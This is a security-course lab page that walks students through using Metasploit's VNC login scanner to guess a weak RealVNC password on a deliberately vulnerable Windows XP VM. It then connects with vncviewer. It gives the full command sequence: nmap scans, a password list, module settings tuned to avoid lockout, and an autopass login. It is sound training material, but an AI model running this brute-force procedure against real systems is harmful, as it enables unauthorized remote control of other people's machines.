ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploit >> Current Page |Views: 30123

(Metasploit: Lesson 14)

{ Illustrate RealVNC Weak Password Exploit }


Section 0. Background Information
  1. What is the RealVNC Weak Password Exploit?
    • The CVE Vulnerability number is CVE-1999-0506.  The vulnerability  is where a Windows NT domain user or administrator account has a default, null, blank, missing password, or easy to guess password.
     
  2. What is the RealVNC?
    • RealVNC is a company that provides remote access software. The software consists of a server and client application for the Virtual Network Computing (VNC) protocol to control another computer's screen remotely.
    • https://www.realvnc.com/
     
  3. What is Metasploit?
    • The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.

  4. What is Damn Vulnerable Windows XP?
    • This is a Windows XP Virtual Machine that provides a practice environment to conduct ethical penetration testing, vulnerability assessment, exploitation and forensics investigation.
    • The Microsoft Software License Terms for the IE VMs are included in the release notes.
    • By downloading and using this software, you agree to these license terms.

  5. Pre-Requisite
  6. Lab Notes
    • In this lab we will do the following:
      1. Power on Damn Vulnerable WXP-SP2
      2. Power on Kali
      3. Use the Metasploit RealVNC Brute Force Module (auxiliary/scanner/vnc/vnc_login)to guess Victim Password.
      4. Remotely Connect to Vulnerable Host with Kali's vncviewer
     
  7. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Log into Damn Vulnerable WXP-SP2
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button

     

  4. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine

     

  5. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Administrator
      2. Password: Supply Password
        •  (See Note)
      3. Press <Enter> or Click the Arrow
    • Note(FYI):
      1. Password was created in (Lab 1, Section 1, Step 8)

     

  6. Open the Command Prompt
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Accessories --> Command Prompt

     

  7. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
      2. Record Your IP Address
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine.

 

Section 2: Log into Kali
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD
      2. Click on the radio button "Use physical drive:".
      3. Select Auto detect

     

  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button

     

  5. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine

     

  6. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button

     

  7. Supply Password
    • Instructions:
      1. Password: <Provide you Kali root password>
      2. Click the Log In Button

     

  8. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  9. Obtain IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      1. Your IP Address should be after the string "inet addr:"
      2. Mine is 192.168.1.109
      3. Please record your IP Address

 

Section 3: NMAP Scans
  1. NMAP Basic Scan
    • Note(FYI):
      1. Replace 192.168.1.116 with your Damn Vulnerable XP-SP2 IP Address found in (Section 1, Step 7).
      2. nmap - We will use a basic nmap scan to see which services/port are running on Damn Vulnerable XP-SP2.
      3. You can see VNC is running on both ports tcp/5800 and tcp/5900.
    • Instructions:
      1. nmap 192.168.1.116

     

  2. NMAP Version Services Scan
    • Note(FYI):
      1. Replace 192.168.1.116 with your Damn Vulnerable XP-SP2 IP Address found in (Section 1, Step 7).
      2. nmap - We will use a nmap version services scan to see the version of the services that are running.
        • (-sV) Probe open ports to determine service/version info
        • (-T4) The (-T) is a timing template that contains the following values: paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5)
      3. You can see that the version of RealVNC is 4.0 and VNC is using the 3.8 protocol.
      4. Imagine an internet scanner/crawler whose sole purpose was to look for old WXP/W2K3 servers running old versions of RealVNC.
    • Instructions:
      1. nmap -sV -T4 192.168.1.116

     

  3. NMAP Aggressive Scan
    • Note(FYI):
      1. Replace 192.168.1.116 with your Damn Vulnerable XP-SP2 IP Address found in (Section 1, Step 7).
      2. nmap - We will use a nmap aggressive scan to enable OS detection, Version Scanning, Script Scanning, and Traceroute..
        • (-A) this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
      3. You can see that the Operating System Version is Windows XP, running either SP2 or SP3.
      4. Imagine an internet scanner/crawler whose sole purpose was to look for old WXP/W2K3 servers with down-leveled service packs.
    • Instructions:
      1. nmap -A -T4 192.168.1.116

     

Section 4: Create Password File
  1. Create Password File
    • Instructions:
      1. echo "admin" > /var/tmp/passwd.txt
      2. echo "password" >> /var/tmp/passwd.txt
      3. echo "abc123" >> /var/tmp/passwd.txt
      4. cat /var/tmp/passwd.txt
    • Note(FYI):
      1. (>) is called a redirect operator.  In case #1, I am using it to (1) create a file called /var/tmp/passwd.txt -and- to (2) place "admin" in the first line.
      2. (>>) is called an append operator.  In case #2 and #3, the string "password" and "abc123" are appended to the end of the file.
      3. In case #4, we display the new created file (/var/tmp/passwd.txt) with the cat command.

 

Section 5: It's Metasploit Time
  1. Start the Metasploit Framework Console
    • Instructions:
      1. msfconsole

     

  2. Set Exploit
    • Instructions:
      1. use auxiliary/scanner/vnc/vnc_login
    • Note(FYI):
      1. This module is the VNC Authentication Scanner.
      2. This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.
      3. Reference

     

  3. Show Options
    • Instructions:
      1. show options
    • Note(FYI):
      1. The show options command will show all the vnc_login auxiliary module options.

     

  4. Set RHOSTS
    • Instructions:
      1. set RHOSTS 192.168.1.116
      2. show options
      3. Verify RHOSTS is set to the Damn Vulnerable WXP-SP2 IP Address
    • Note(FYI):
      1. Replace 192.168.1.116 with your Damn Vulnerable XP-SP2 IP Address found in (Section 1, Step 7).
      2. RHOST is the target/victim IP address.

     

  5. Set PASS_FILE
    • Instructions:
      1. set PASS_FILE /var/tmp/passwd.txt
      2. show options
      3. Verify that PASS_FILE is set to /var/tmp/passwd.txt
    • Note(FYI):
      1. PASS_FILE is a file containing a list passwords.

     

  6. Set BRUTEFORCE_SPEED
    • Instructions:
      1. set BRUTEFORCE_SPEED 1
      2. show options
      3. Verify that BRUTEFORCE_SPEED is set to 1
    • Note(FYI):
      1. BRUTEFORCE_SPEED ranges from 0 (slowest) to 5 (faster).
      2. RealVNC will lock out connection attempts after 5 unsuccessful login attempts in a certain time period.  So, the key is to go "slowly but surely".

     

  7. Set STOP_ON_SUCCESS
    • Instructions:
      1. set STOP_ON_SUCCESS true
      2. show options
      3. Verify that STOP_ON_SUCCESS is set to true
    • Note(FYI):
      1. STOP_ON_SUCCESS - Stop guessing after the password has been discovered.

     

  8. Start Listener
    • Instructions:
      1. exploit
      2. Notice that the VNC Scanner successfully guessed the password

 

Section 6: Connect with vncviewer
  1. Open Another Terminal Window (On Kali)
    • Instructions:
      1. Applications --> Accessories --> Terminal

     

  2. Opening vncviewer (On Kali)
    • Instructions:
      1. echo "abc123" | vncviewer 192.168.1.116 -autopass
    • Note(FYI):
      1. Replace 192.168.1.116 with your Damn Vulnerable XP-SP2 IP Address found in (Section 1, Step 7).
      2. vncviewer - This is a client to viewer VNC connections.
      3. (-autopass) - allow the user to echo standard input (abc123) to vncviewer.
      4. You should now see Damn Vulnerable WXP-SP2 instead your Kali machine.
      5. Continue to next step.

     

  3. Using vncviewer (On Kali)
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Accessories --> Command Prompt
    • Note(FYI):
      1. Continue to the Proof of Lab Section

     

Section 7: Proof of Lab
  1. Proof of Lab (On Kali)
    • Instructions:
      1. netstat -nao | findstr "5900"
      2. tasklist 2>NUL | find /i "vnc"
      3. date
      4. echo "Your Name"
    • Note(FYI):
      1. Command #1, In my case, note that the Process ID associated with the VNC is 540. In addition, notice the Kali IP address that is ESTABLISHED (192.168.1.116:5900).
      2. Command #2, Note that the Process ID (540) associated with winvnc.exe.
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth